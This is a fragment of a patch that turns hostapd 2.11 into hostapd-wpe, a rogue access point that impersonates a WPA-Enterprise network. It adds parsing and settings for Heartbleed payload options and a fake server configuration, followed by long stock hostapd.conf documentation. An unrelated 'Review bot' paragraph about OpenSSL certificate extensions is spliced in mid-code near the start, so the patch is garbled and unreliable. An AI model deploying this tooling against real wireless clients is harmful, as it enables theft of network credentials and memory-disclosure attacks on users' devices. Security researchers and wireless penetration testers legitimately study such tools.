(os_strcmp(buf, 
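Review bot: `[ xpserver_ext]` and `[ xpclient_ext]` add only an `extendedKeyUsage` and a CRL URI, so certificates issued through `openssl ca -extensions xpserver_ext`/`xpclient_ext` carry no `basicConstraints`, `subjectKeyIdentifier`, or `authorityKeyIdentifier`; adding `basicConstraints = CA:FALSE`, `subjectKeyIdentifier = hash` and `authorityKeyIdentifier = keyid,issuer` to both sections is the usual end-entity profile and mirrors what ca.cnf already sets for the CA itself. The server section also has no `subjectAltName`, which some newer supplicants can be configured to check instead of the commonName; worth a comment even if left out deliberately. The closing comment block about `1.3.6.1.4.1.311.17.2` reads as if it were applied, but the OID appears in no section; a line such as `# not applied by the sections above; documented for reference only` would make that explicit.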
"wpe_hb_num_repeats") == 0) { ++ wpe_conf.wpe_hb_num_repeats = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) { ++ wpe_conf.wpe_hb_num_tries = atoi(pos); ++#endif /* #if OPENSSL_VERSION_NUMBER < 0x10100000L */ + #ifdef EAP_SERVER + } else if (os_strcmp(buf, "eap_authenticator") == 0) { + bss->eap_server = atoi(pos); +diff '--color=auto' -rupN hostapd-2.11/hostapd/hostapd-wpe.conf hostapd-2.11-wpe/hostapd/hostapd-wpe.conf +--- hostapd-2.11/hostapd/hostapd-wpe.conf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/hostapd-wpe.conf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,2042 @@ ++# Configuration file for hostapd-wpe ++ ++# Interface - Probably wlan0 for 802.11, eth0 for wired ++interface=wlan0 ++ ++# May have to change these depending on build location ++eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user ++ca_cert=/etc/hostapd-wpe/ca.pem ++server_cert=/etc/hostapd-wpe/server.pem ++private_key=/etc/hostapd-wpe/server.key ++private_key_passwd=whatever ++dh_file=/etc/hostapd-wpe/dh ++ ++# 802.11 Options ++ssid=hostapd-wpe ++channel=1 ++ ++# WPE Options - Dont need to change these to make it all work ++# ++# wpe_logfile=somefile # (Default: ./hostapd-wpe.log) ++# wpe_hb_send_before_handshake=0 # Heartbleed True/False (Default: 1) ++# wpe_hb_send_before_appdata=0 # Heartbleed True/False (Default: 0) ++# wpe_hb_send_after_appdata=0 # Heartbleed True/False (Default: 0) ++# wpe_hb_payload_size=0 # Heartbleed 0-65535 (Default: 50000) ++# wpe_hb_num_repeats=0 # Heartbleed 0-65535 (Default: 1) ++# wpe_hb_num_tries=0 # Heartbleed 0-65535 (Default: 1) ++ ++ ++# Dont mess with unless you know what you're doing ++eap_server=1 ++eap_fast_a_id=101112131415161718191a1b1c1d1e1f ++eap_fast_a_id_info=hostapd-wpe ++eap_fast_prov=3 ++ieee8021x=1 ++pac_key_lifetime=604800 ++pac_key_refresh_time=86400 ++pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f ++wpa=2 ++wpa_key_mgmt=WPA-EAP ++wpa_pairwise=CCMP ++rsn_pairwise=CCMP ++ 
++############################################################################## ++# Everything below this line is pretty much the standard hostapd.conf ++############################################################################### ++ ++##### hostapd configuration file ############################################## ++# Empty lines and lines starting with # are ignored ++ ++# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for ++# management frames with the Host AP driver); wlan0 with many nl80211 drivers ++# Note: This attribute can be overridden by the values supplied with the '-i' ++# command line parameter. ++#interface=wlan0 ++ ++# In case of atheros and nl80211 driver interfaces, an additional ++# configuration parameter, bridge, may be used to notify hostapd if the ++# interface is included in a bridge. This parameter is not used with Host AP ++# driver. If the bridge parameter is not set, the drivers will automatically ++# figure out the bridge interface (assuming sysfs is enabled and mounted to ++# /sys) and this parameter may not be needed. ++# ++# For nl80211, this parameter can be used to request the AP interface to be ++# added to the bridge automatically (brctl may refuse to do this before hostapd ++# has been started to change the interface mode). If needed, the bridge ++# interface is also created. ++#bridge=br0 ++ ++# Driver interface type (hostap/wired/none/nl80211/bsd); ++# default: hostap). nl80211 is used with all Linux mac80211 drivers. ++# Use driver=none if building hostapd as a standalone RADIUS server that does ++# not control any wireless/wired driver. ++# driver=hostap ++ ++# Driver interface parameters (mainly for development testing use) ++# driver_params= ++ ++# hostapd event logger configuration ++# ++# Two output method: syslog and stdout (only usable if not forking to ++# background). 
++# ++# Module bitfield (ORed bitfield of modules that will be logged; -1 = all ++# modules): ++# bit 0 (1) = IEEE 802.11 ++# bit 1 (2) = IEEE 802.1X ++# bit 2 (4) = RADIUS ++# bit 3 (8) = WPA ++# bit 4 (16) = driver interface ++# bit 5 (32) = IAPP ++# bit 6 (64) = MLME ++# ++# Levels (minimum value for logged events): ++# 0 = verbose debugging ++# 1 = debugging ++# 2 = informational messages ++# 3 = notification ++# 4 = warning ++# ++logger_syslog=-1 ++logger_syslog_level=2 ++logger_stdout=-1 ++logger_stdout_level=2 ++ ++# Interface for separate control program. If this is specified, hostapd ++# will create this directory and a UNIX domain socket for listening to requests ++# from external programs (CLI/GUI, etc.) for status information and ++# configuration. The socket file will be named based on the interface name, so ++# multiple hostapd processes/interfaces can be run at the same time if more ++# than one interface is used. ++# /var/run/hostapd is the recommended directory for sockets and by default, ++# hostapd_cli will use it when trying to connect with hostapd. ++ctrl_interface=/var/run/hostapd ++ ++# Access control for the control interface can be configured by setting the ++# directory to allow only members of a group to use sockets. This way, it is ++# possible to run hostapd as root (since it needs to change network ++# configuration and open raw sockets) and still allow GUI/CLI components to be ++# run as non-root users. However, since the control interface can be used to ++# change the network configuration, this access needs to be protected in many ++# cases. By default, hostapd is configured to use gid 0 (root). If you ++# want to allow non-root users to use the contron interface, add a new group ++# and change this value to match with that group. Add users that should have ++# control interface access to this group. ++# ++# This variable can be a group name or gid. 
++#ctrl_interface_group=wheel ++ctrl_interface_group=0 ++ ++ ++##### IEEE 802.11 related configuration ####################################### ++ ++# SSID to be used in IEEE 802.11 management frames ++#ssid=test ++# Alternative formats for configuring SSID ++# (double quoted string, hexdump, printf-escaped string) ++#ssid2="test" ++#ssid2=74657374 ++#ssid2=P"hello\nthere" ++ ++# UTF-8 SSID: Whether the SSID is to be interpreted using UTF-8 encoding ++#utf8_ssid=1 ++ ++# Country code (ISO/IEC 3166-1). Used to set regulatory domain. ++# Set as needed to indicate country in which device is operating. ++# This can limit available channels and transmit power. ++#country_code=US ++ ++# Enable IEEE 802.11d. This advertises the country_code and the set of allowed ++# channels and transmit power levels based on the regulatory limits. The ++# country_code setting must be configured with the correct country for ++# IEEE 802.11d functions. ++# (default: 0 = disabled) ++#ieee80211d=1 ++ ++# Enable IEEE 802.11h. This enables radar detection and DFS support if ++# available. DFS support is required on outdoor 5 GHz channels in most countries ++# of the world. This can be used only with ieee80211d=1. ++# (default: 0 = disabled) ++#ieee80211h=1 ++ ++# Add Power Constraint element to Beacon and Probe Response frames ++# This config option adds Power Constraint element when applicable and Country ++# element is added. Power Constraint element is required by Transmit Power ++# Control. This can be used only with ieee80211d=1. ++# Valid values are 0..255. ++#local_pwr_constraint=3 ++ ++# Set Spectrum Management subfield in the Capability Information field. ++# This config option forces the Spectrum Management bit to be set. When this ++# option is not set, the value of the Spectrum Management bit depends on whether ++# DFS or TPC is required by regulatory authorities. This can be used only with ++# ieee80211d=1 and local_pwr_constraint configured. 
++#spectrum_mgmt_required=1 ++ ++# Operation mode (a = IEEE 802.11a (5 GHz), b = IEEE 802.11b (2.4 GHz), ++# g = IEEE 802.11g (2.4 GHz), ad = IEEE 802.11ad (60 GHz); a/g options are used ++# with IEEE 802.11n (HT), too, to specify band). For IEEE 802.11ac (VHT), this ++# needs to be set to hw_mode=a. When using ACS (see channel parameter), a ++# special value "any" can be used to indicate that any support band can be used. ++# This special case is currently supported only with drivers with which ++# offloaded ACS is used. ++# Default: IEEE 802.11b ++hw_mode=g ++ ++# Channel number (IEEE 802.11) ++# (default: 0, i.e., not set) ++# Please note that some drivers do not use this value from hostapd and the ++# channel will need to be configured separately with iwconfig. ++# ++# If CONFIG_ACS build option is enabled, the channel can be selected ++# automatically at run time by setting channel=acs_survey or channel=0, both of ++# which will enable the ACS survey based algorithm. ++#channel=1 ++ ++# ACS tuning - Automatic Channel Selection ++# See: http://wireless.kernel.org/en/users/Documentation/acs ++# ++# You can customize the ACS survey algorithm with following variables: ++# ++# acs_num_scans requirement is 1..100 - number of scans to be performed that ++# are used to trigger survey data gathering of an underlying device driver. ++# Scans are passive and typically take a little over 100ms (depending on the ++# driver) on each available channel for given hw_mode. Increasing this value ++# means sacrificing startup time and gathering more data wrt channel ++# interference that may help choosing a better channel. This can also help fine ++# tune the ACS scan time in case a driver has different scan dwell times. ++# ++# acs_chan_bias is a space-separated list of : pairs. It can be ++# used to increase (or decrease) the likelihood of a specific channel to be ++# selected by the ACS algorithm. 
The total interference factor for each channel ++# gets multiplied by the specified bias value before finding the channel with ++# the lowest value. In other words, values between 0.0 and 1.0 can be used to ++# make a channel more likely to be picked while values larger than 1.0 make the ++# specified channel less likely to be picked. This can be used, e.g., to prefer ++# the commonly used 2.4 GHz band channels 1, 6, and 11 (which is the default ++# behavior on 2.4 GHz band if no acs_chan_bias parameter is specified). ++# ++# Defaults: ++#acs_num_scans=5 ++#acs_chan_bias=1:0.8 6:0.8 11:0.8 ++ ++# Channel list restriction. This option allows hostapd to select one of the ++# provided channels when a channel should be automatically selected. ++# Channel list can be provided as range using hyphen ('-') or individual ++# channels can be specified by space (' ') separated values ++# Default: all channels allowed in selected hw_mode ++#chanlist=100 104 108 112 116 ++#chanlist=1 6 11-13 ++ ++# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535) ++beacon_int=100 ++ ++# DTIM (delivery traffic information message) period (range 1..255): ++# number of beacons between DTIMs (1 = every beacon includes DTIM element) ++# (default: 2) ++dtim_period=2 ++ ++# Maximum number of stations allowed in station table. New stations will be ++# rejected after the station table is full. IEEE 802.11 has a limit of 2007 ++# different association IDs, so this number should not be larger than that. ++# (default: 2007) ++max_num_sta=255 ++ ++# RTS/CTS threshold; -1 = disabled (default); range -1..65535 ++# If this field is not included in hostapd.conf, hostapd will not control ++# RTS threshold and 'iwconfig wlan# rts ' can be used to set it. 
++rts_threshold=-1 ++ ++# Fragmentation threshold; -1 = disabled (default); range -1, 256..2346 ++# If this field is not included in hostapd.conf, hostapd will not control ++# fragmentation threshold and 'iwconfig wlan# frag ' can be used to set ++# it. ++fragm_threshold=-1 ++ ++# Rate configuration ++# Default is to enable all rates supported by the hardware. This configuration ++# item allows this list be filtered so that only the listed rates will be left ++# in the list. If the list is empty, all rates are used. This list can have ++# entries that are not in the list of rates the hardware supports (such entries ++# are ignored). The entries in this list are in 100 kbps, i.e., 11 Mbps = 110. ++# If this item is present, at least one rate have to be matching with the rates ++# hardware supports. ++# default: use the most common supported rate setting for the selected ++# hw_mode (i.e., this line can be removed from configuration file in most ++# cases) ++#supported_rates=10 20 55 110 60 90 120 180 240 360 480 540 ++ ++# Basic rate set configuration ++# List of rates (in 100 kbps) that are included in the basic rate set. ++# If this item is not included, usually reasonable default set is used. ++#basic_rates=10 20 ++#basic_rates=10 20 55 110 ++#basic_rates=60 120 240 ++ ++# Short Preamble ++# This parameter can be used to enable optional use of short preamble for ++# frames sent at 2 Mbps, 5.5 Mbps, and 11 Mbps to improve network performance. ++# This applies only to IEEE 802.11b-compatible networks and this should only be ++# enabled if the local hardware supports use of short preamble. If any of the ++# associated STAs do not support short preamble, use of short preamble will be ++# disabled (and enabled when such STAs disassociate) dynamically. 
++# 0 = do not allow use of short preamble (default) ++# 1 = allow use of short preamble ++#preamble=1 ++ ++# Station MAC address -based authentication ++# Please note that this kind of access control requires a driver that uses ++# hostapd to take care of management frame processing and as such, this can be ++# used with driver=hostap or driver=nl80211, but not with driver=atheros. ++# 0 = accept unless in deny list ++# 1 = deny unless in accept list ++# 2 = use external RADIUS server (accept/deny lists are searched first) ++macaddr_acl=0 ++ ++# Accept/deny lists are read from separate files (containing list of ++# MAC addresses, one per line). Use absolute path name to make sure that the ++# files can be read on SIGHUP configuration reloads. ++#accept_mac_file=/etc/hostapd.accept ++#deny_mac_file=/etc/hostapd.deny ++ ++# IEEE 802.11 specifies two authentication algorithms. hostapd can be ++# configured to allow both of these or only one. Open system authentication ++# should be used with IEEE 802.1X. ++# Bit fields of allowed authentication algorithms: ++# bit 0 = Open System Authentication ++# bit 1 = Shared Key Authentication (requires WEP) ++auth_algs=3 ++ ++# Send empty SSID in beacons and ignore probe request frames that do not ++# specify full SSID, i.e., require stations to know SSID. ++# default: disabled (0) ++# 1 = send empty (length=0) SSID in beacon and ignore probe request for ++# broadcast SSID ++# 2 = clear SSID (ASCII 0), but keep the original length (this may be required ++# with some clients that do not support empty SSID) and ignore probe ++# requests for broadcast SSID ++ignore_broadcast_ssid=0 ++ ++# Do not reply to broadcast Probe Request frames from unassociated STA if there ++# is no room for additional stations (max_num_sta). This can be used to ++# discourage a STA from trying to associate with this AP if the association ++# would be rejected due to maximum STA limit. 
++# Default: 0 (disabled) ++#no_probe_resp_if_max_sta=0 ++ ++# Additional vendor specific elements for Beacon and Probe Response frames ++# This parameter can be used to add additional vendor specific element(s) into ++# the end of the Beacon and Probe Response frames. The format for these ++# element(s) is a hexdump of the raw information elements (id+len+payload for ++# one or more elements) ++#vendor_elements=dd0411223301 ++ ++# Additional vendor specific elements for (Re)Association Response frames ++# This parameter can be used to add additional vendor specific element(s) into ++# the end of the (Re)Association Response frames. The format for these ++# element(s) is a hexdump of the raw information elements (id+len+payload for ++# one or more elements) ++#assocresp_elements=dd0411223301 ++ ++# TX queue parameters (EDCF / bursting) ++# tx_queue__ ++# queues: data0, data1, data2, data3, after_beacon, beacon ++# (data0 is the highest priority queue) ++# parameters: ++# aifs: AIFS (default 2) ++# cwmin: cwMin (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, ++# 16383, 32767) ++# cwmax: cwMax (same values as cwMin, cwMax >= cwMin) ++# burst: maximum length (in milliseconds with precision of up to 0.1 ms) for ++# bursting ++# ++# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): ++# These parameters are used by the access point when transmitting frames ++# to the clients. 
++# ++# Low priority / AC_BK = background ++#tx_queue_data3_aifs=7 ++#tx_queue_data3_cwmin=15 ++#tx_queue_data3_cwmax=1023 ++#tx_queue_data3_burst=0 ++# Note: for IEEE 802.11b mode: cWmin=31 cWmax=1023 burst=0 ++# ++# Normal priority / AC_BE = best effort ++#tx_queue_data2_aifs=3 ++#tx_queue_data2_cwmin=15 ++#tx_queue_data2_cwmax=63 ++#tx_queue_data2_burst=0 ++# Note: for IEEE 802.11b mode: cWmin=31 cWmax=127 burst=0 ++# ++# High priority / AC_VI = video ++#tx_queue_data1_aifs=1 ++#tx_queue_data1_cwmin=7 ++#tx_queue_data1_cwmax=15 ++#tx_queue_data1_burst=3.0 ++# Note: for IEEE 802.11b mode: cWmin=15 cWmax=31 burst=6.0 ++# ++# Highest priority / AC_VO = voice ++#tx_queue_data0_aifs=1 ++#tx_queue_data0_cwmin=3 ++#tx_queue_data0_cwmax=7 ++#tx_queue_data0_burst=1.5 ++# Note: for IEEE 802.11b mode: cWmin=7 cWmax=15 burst=3.3 ++ ++# 802.1D Tag (= UP) to AC mappings ++# WMM specifies following mapping of data frames to different ACs. This mapping ++# can be configured using Linux QoS/tc and sch_pktpri.o module. ++# 802.1D Tag 802.1D Designation Access Category WMM Designation ++# 1 BK AC_BK Background ++# 2 - AC_BK Background ++# 0 BE AC_BE Best Effort ++# 3 EE AC_BE Best Effort ++# 4 CL AC_VI Video ++# 5 VI AC_VI Video ++# 6 VO AC_VO Voice ++# 7 NC AC_VO Voice ++# Data frames with no priority information: AC_BE ++# Management frames: AC_VO ++# PS-Poll frames: AC_BE ++ ++# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): ++# for 802.11a or 802.11g networks ++# These parameters are sent to WMM clients when they associate. ++# The parameters will be used by WMM clients for frames transmitted to the ++# access point. ++# ++# note - txop_limit is in units of 32microseconds ++# note - acm is admission control mandatory flag. 0 = admission control not ++# required, 1 = mandatory ++# note - Here cwMin and cmMax are in exponent form. The actual cw value used ++# will be (2^n)-1 where n is the value given here. 
The allowed range for these ++# wmm_ac_??_{cwmin,cwmax} is 0..15 with cwmax >= cwmin. ++# ++wmm_enabled=1 ++# ++# WMM-PS Unscheduled Automatic Power Save Delivery [U-APSD] ++# Enable this flag if U-APSD supported outside hostapd (eg., Firmware/driver) ++#uapsd_advertisement_enabled=1 ++# ++# Low priority / AC_BK = background ++wmm_ac_bk_cwmin=4 ++wmm_ac_bk_cwmax=10 ++wmm_ac_bk_aifs=7 ++wmm_ac_bk_txop_limit=0 ++wmm_ac_bk_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=5 cWmax=10 ++# ++# Normal priority / AC_BE = best effort ++wmm_ac_be_aifs=3 ++wmm_ac_be_cwmin=4 ++wmm_ac_be_cwmax=10 ++wmm_ac_be_txop_limit=0 ++wmm_ac_be_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=5 cWmax=7 ++# ++# High priority / AC_VI = video ++wmm_ac_vi_aifs=2 ++wmm_ac_vi_cwmin=3 ++wmm_ac_vi_cwmax=4 ++wmm_ac_vi_txop_limit=94 ++wmm_ac_vi_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=4 cWmax=5 txop_limit=188 ++# ++# Highest priority / AC_VO = voice ++wmm_ac_vo_aifs=2 ++wmm_ac_vo_cwmin=2 ++wmm_ac_vo_cwmax=3 ++wmm_ac_vo_txop_limit=47 ++wmm_ac_vo_acm=0 ++# Note: for IEEE 802.11b mode: cWmin=3 cWmax=4 burst=102 ++ ++# Static WEP key configuration ++# ++# The key number to use when transmitting. ++# It must be between 0 and 3, and the corresponding key must be set. ++# default: not set ++#wep_default_key=0 ++# The WEP keys to use. ++# A key may be a quoted string or unquoted hexadecimal digits. ++# The key length should be 5, 13, or 16 characters, or 10, 26, or 32 ++# digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or ++# 128-bit (152-bit) WEP is used. ++# Only the default key must be supplied; the others are optional. ++# default: not set ++#wep_key0=123456789a ++#wep_key1="vwxyz" ++#wep_key2=0102030405060708090a0b0c0d ++#wep_key3=".2.4.6.8.0.23" ++ ++# Station inactivity limit ++# ++# If a station does not send anything in ap_max_inactivity seconds, an ++# empty data frame is sent to it in order to verify whether it is ++# still in range. 
If this frame is not ACKed, the station will be ++# disassociated and then deauthenticated. This feature is used to ++# clear station table of old entries when the STAs move out of the ++# range. ++# ++# The station can associate again with the AP if it is still in range; ++# this inactivity poll is just used as a nicer way of verifying ++# inactivity; i.e., client will not report broken connection because ++# disassociation frame is not sent immediately without first polling ++# the STA with a data frame. ++# default: 300 (i.e., 5 minutes) ++#ap_max_inactivity=300 ++# ++# The inactivity polling can be disabled to disconnect stations based on ++# inactivity timeout so that idle stations are more likely to be disconnected ++# even if they are still in range of the AP. This can be done by setting ++# skip_inactivity_poll to 1 (default 0). ++#skip_inactivity_poll=0 ++ ++# Disassociate stations based on excessive transmission failures or other ++# indications of connection loss. This depends on the driver capabilities and ++# may not be available with all drivers. ++#disassoc_low_ack=1 ++ ++# Maximum allowed Listen Interval (how many Beacon periods STAs are allowed to ++# remain asleep). Default: 65535 (no limit apart from field size) ++#max_listen_interval=100 ++ ++# WDS (4-address frame) mode with per-station virtual interfaces ++# (only supported with driver=nl80211) ++# This mode allows associated stations to use 4-address frames to allow layer 2 ++# bridging to be used. ++#wds_sta=1 ++ ++# If bridge parameter is set, the WDS STA interface will be added to the same ++# bridge by default. This can be overridden with the wds_bridge parameter to ++# use a separate bridge. ++#wds_bridge=wds-br0 ++ ++# Start the AP with beaconing disabled by default. ++#start_disabled=0 ++ ++# Client isolation can be used to prevent low-level bridging of frames between ++# associated stations in the BSS. By default, this bridging is allowed. 
++#ap_isolate=1 ++ ++# BSS Load update period (in BUs) ++# This field is used to enable and configure adding a BSS Load element into ++# Beacon and Probe Response frames. ++#bss_load_update_period=50 ++ ++# Fixed BSS Load value for testing purposes ++# This field can be used to configure hostapd to add a fixed BSS Load element ++# into Beacon and Probe Response frames for testing purposes. The format is ++# :: ++#bss_load_test=12:80:20000 ++ ++##### IEEE 802.11n related configuration ###################################### ++ ++# ieee80211n: Whether IEEE 802.11n (HT) is enabled ++# 0 = disabled (default) ++# 1 = enabled ++# Note: You will also need to enable WMM for full HT functionality. ++# Note: hw_mode=g (2.4 GHz) and hw_mode=a (5 GHz) is used to specify the band. ++#ieee80211n=1 ++ ++# ht_capab: HT capabilities (list of flags) ++# LDPC coding capability: [LDPC] = supported ++# Supported channel width set: [HT40-] = both 20 MHz and 40 MHz with secondary ++# channel below the primary channel; [HT40+] = both 20 MHz and 40 MHz ++# with secondary channel above the primary channel ++# (20 MHz only if neither is set) ++# Note: There are limits on which channels can be used with HT40- and ++# HT40+. Following table shows the channels that may be available for ++# HT40- and HT40+ use per IEEE 802.11n Annex J: ++# freq HT40- HT40+ ++# 2.4 GHz 5-13 1-7 (1-9 in Europe/Japan) ++# 5 GHz 40,48,56,64 36,44,52,60 ++# (depending on the location, not all of these channels may be available ++# for use) ++# Please note that 40 MHz channels may switch their primary and secondary ++# channels if needed or creation of 40 MHz channel maybe rejected based ++# on overlapping BSSes. These changes are done automatically when hostapd ++# is setting up the 40 MHz channel. 
++# Spatial Multiplexing (SM) Power Save: [SMPS-STATIC] or [SMPS-DYNAMIC] ++# (SMPS disabled if neither is set) ++# HT-greenfield: [GF] (disabled if not set) ++# Short GI for 20 MHz: [SHORT-GI-20] (disabled if not set) ++# Short GI for 40 MHz: [SHORT-GI-40] (disabled if not set) ++# Tx STBC: [TX-STBC] (disabled if not set) ++# Rx STBC: [RX-STBC1] (one spatial stream), [RX-STBC12] (one or two spatial ++# streams), or [RX-STBC123] (one, two, or three spatial streams); Rx STBC ++# disabled if none of these set ++# HT-delayed Block Ack: [DELAYED-BA] (disabled if not set) ++# Maximum A-MSDU length: [MAX-AMSDU-7935] for 7935 octets (3839 octets if not ++# set) ++# DSSS/CCK Mode in 40 MHz: [DSSS_CCK-40] = allowed (not allowed if not set) ++# 40 MHz intolerant [40-INTOLERANT] (not advertised if not set) ++# L-SIG TXOP protection support: [LSIG-TXOP-PROT] (disabled if not set) ++#ht_capab=[HT40-][SHORT-GI-20][SHORT-GI-40] ++ ++# Require stations to support HT PHY (reject association if they do not) ++#require_ht=1 ++ ++# If set non-zero, require stations to perform scans of overlapping ++# channels to test for stations which would be affected by 40 MHz traffic. ++# This parameter sets the interval in seconds between these scans. Setting this ++# to non-zero allows 2.4 GHz band AP to move dynamically to a 40 MHz channel if ++# no co-existence issues with neighboring devices are found. ++#obss_interval=0 ++ ++##### IEEE 802.11ac related configuration ##################################### ++ ++# ieee80211ac: Whether IEEE 802.11ac (VHT) is enabled ++# 0 = disabled (default) ++# 1 = enabled ++# Note: You will also need to enable WMM for full VHT functionality. ++# Note: hw_mode=a is used to specify that 5 GHz band is used with VHT. 
++#ieee80211ac=1 ++ ++# vht_capab: VHT capabilities (list of flags) ++# ++# vht_max_mpdu_len: [MAX-MPDU-7991] [MAX-MPDU-11454] ++# Indicates maximum MPDU length ++# 0 = 3895 octets (default) ++# 1 = 7991 octets ++# 2 = 11454 octets ++# 3 = reserved ++# ++# supported_chan_width: [VHT160] [VHT160-80PLUS80] ++# Indicates supported Channel widths ++# 0 = 160 MHz & 80+80 channel widths are not supported (default) ++# 1 = 160 MHz channel width is supported ++# 2 = 160 MHz & 80+80 channel widths are supported ++# 3 = reserved ++# ++# Rx LDPC coding capability: [RXLDPC] ++# Indicates support for receiving LDPC coded pkts ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Short GI for 80 MHz: [SHORT-GI-80] ++# Indicates short GI support for reception of packets transmitted with TXVECTOR ++# params format equal to VHT and CBW = 80Mhz ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Short GI for 160 MHz: [SHORT-GI-160] ++# Indicates short GI support for reception of packets transmitted with TXVECTOR ++# params format equal to VHT and CBW = 160Mhz ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Tx STBC: [TX-STBC-2BY1] ++# Indicates support for the transmission of at least 2x1 STBC ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Rx STBC: [RX-STBC-1] [RX-STBC-12] [RX-STBC-123] [RX-STBC-1234] ++# Indicates support for the reception of PPDUs using STBC ++# 0 = Not supported (default) ++# 1 = support of one spatial stream ++# 2 = support of one and two spatial streams ++# 3 = support of one, two and three spatial streams ++# 4 = support of one, two, three and four spatial streams ++# 5,6,7 = reserved ++# ++# SU Beamformer Capable: [SU-BEAMFORMER] ++# Indicates support for operation as a single user beamformer ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# SU Beamformee Capable: [SU-BEAMFORMEE] ++# Indicates support for operation as a single user beamformee ++# 0 = Not supported (default) ++# 1 = Supported ++# ++# Compressed Steering 
Number of Beamformer Antennas Supported: ++# [BF-ANTENNA-2] [BF-ANTENNA-3] [BF-ANTENNA-4] ++# Beamformee's capability indicating the maximum number of beamformer ++# antennas the beamformee can support when sending compressed beamforming ++# feedback ++# If SU beamformer capable, set to maximum value minus 1 ++# else reserved (default) ++# ++# Number of Sounding Dimensions: ++# [SOUNDING-DIMENSION-2] [SOUNDING-DIMENSION-3] [SOUNDING-DIMENSION-4] ++# Beamformer's capability indicating the maximum value of the NUM_STS parameter ++# in the TXVECTOR of a VHT NDP ++# If SU beamformer capable, set to maximum value minus 1 ++# else reserved (default) ++# ++# MU Beamformer Capable: [MU-BEAMFORMER] ++# Indicates support for operation as an MU beamformer ++# 0 = Not supported or sent by Non-AP STA (default) ++# 1 = Supported ++# ++# VHT TXOP PS: [VHT-TXOP-PS] ++# Indicates whether or not the AP supports VHT TXOP Power Save Mode ++# or whether or not the STA is in VHT TXOP Power Save mode ++# 0 = VHT AP doesn't support VHT TXOP PS mode (OR) VHT STA not in VHT TXOP PS ++# mode ++# 1 = VHT AP supports VHT TXOP PS mode (OR) VHT STA is in VHT TXOP power save ++# mode ++# ++# +HTC-VHT Capable: [HTC-VHT] ++# Indicates whether or not the STA supports receiving a VHT variant HT Control ++# field. ++# 0 = Not supported (default) ++# 1 = supported ++# ++# Maximum A-MPDU Length Exponent: [MAX-A-MPDU-LEN-EXP0]..[MAX-A-MPDU-LEN-EXP7] ++# Indicates the maximum length of A-MPDU pre-EOF padding that the STA can recv ++# This field is an integer in the range of 0 to 7. 
++# The length defined by this field is equal to ++# 2 pow(13 + Maximum A-MPDU Length Exponent) -1 octets ++# ++# VHT Link Adaptation Capable: [VHT-LINK-ADAPT2] [VHT-LINK-ADAPT3] ++# Indicates whether or not the STA supports link adaptation using VHT variant ++# HT Control field ++# If +HTC-VHTcapable is 1 ++# 0 = (no feedback) if the STA does not provide VHT MFB (default) ++# 1 = reserved ++# 2 = (Unsolicited) if the STA provides only unsolicited VHT MFB ++# 3 = (Both) if the STA can provide VHT MFB in response to VHT MRQ and if the ++# STA provides unsolicited VHT MFB ++# Reserved if +HTC-VHTcapable is 0 ++# ++# Rx Antenna Pattern Consistency: [RX-ANTENNA-PATTERN] ++# Indicates the possibility of Rx antenna pattern change ++# 0 = Rx antenna pattern might change during the lifetime of an association ++# 1 = Rx antenna pattern does not change during the lifetime of an association ++# ++# Tx Antenna Pattern Consistency: [TX-ANTENNA-PATTERN] ++# Indicates the possibility of Tx antenna pattern change ++# 0 = Tx antenna pattern might change during the lifetime of an association ++# 1 = Tx antenna pattern does not change during the lifetime of an association ++#vht_capab=[SHORT-GI-80][HTC-VHT] ++# ++# Require stations to support VHT PHY (reject association if they do not) ++#require_vht=1 ++ ++# 0 = 20 or 40 MHz operating Channel width ++# 1 = 80 MHz channel width ++# 2 = 160 MHz channel width ++# 3 = 80+80 MHz channel width ++#vht_oper_chwidth=1 ++# ++# center freq = 5 GHz + (5 * index) ++# So index 42 gives center freq 5.210 GHz ++# which is channel 42 in 5G band ++# ++#vht_oper_centr_freq_seg0_idx=42 ++# ++# center freq = 5 GHz + (5 * index) ++# So index 159 gives center freq 5.795 GHz ++# which is channel 159 in 5G band ++# ++#vht_oper_centr_freq_seg1_idx=159 ++ ++# Workaround to use station's nsts capability in (Re)Association Response frame ++# This may be needed with some deployed devices as an interoperability ++# workaround for beamforming if the AP's 
capability is greater than the ++# station's capability. This is disabled by default and can be enabled by ++# setting use_sta_nsts=1. ++#use_sta_nsts=0 ++ ++##### IEEE 802.1X-2004 related configuration ################################## ++ ++# Require IEEE 802.1X authorization ++#ieee8021x=1 ++ ++# IEEE 802.1X/EAPOL version ++# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL ++# version 2. However, there are many client implementations that do not handle ++# the new version number correctly (they seem to drop the frames completely). ++# In order to make hostapd interoperate with these clients, the version number ++# can be set to the older version (1) with this configuration value. ++#eapol_version=2 ++ ++# Optional displayable message sent with EAP Request-Identity. The first \0 ++# in this string will be converted to ASCII-0 (nul). This can be used to ++# separate network info (comma separated list of attribute=value pairs); see, ++# e.g., RFC 4284. ++#eap_message=hello ++#eap_message=hello\0networkid=netw,nasid=foo,portid=0,NAIRealms=example.com ++ ++# WEP rekeying (disabled if key lengths are not set or are set to 0) ++# Key lengths for default/broadcast and individual/unicast keys: ++# 5 = 40-bit WEP (also known as 64-bit WEP with 40 secret bits) ++# 13 = 104-bit WEP (also known as 128-bit WEP with 104 secret bits) ++#wep_key_len_broadcast=5 ++#wep_key_len_unicast=5 ++# Rekeying period in seconds. 0 = do not rekey (i.e., set keys only once) ++#wep_rekey_period=300 ++ ++# EAPOL-Key index workaround (set bit7) for WinXP Supplicant (needed only if ++# only broadcast keys are used) ++eapol_key_index_workaround=0 ++ ++# EAP 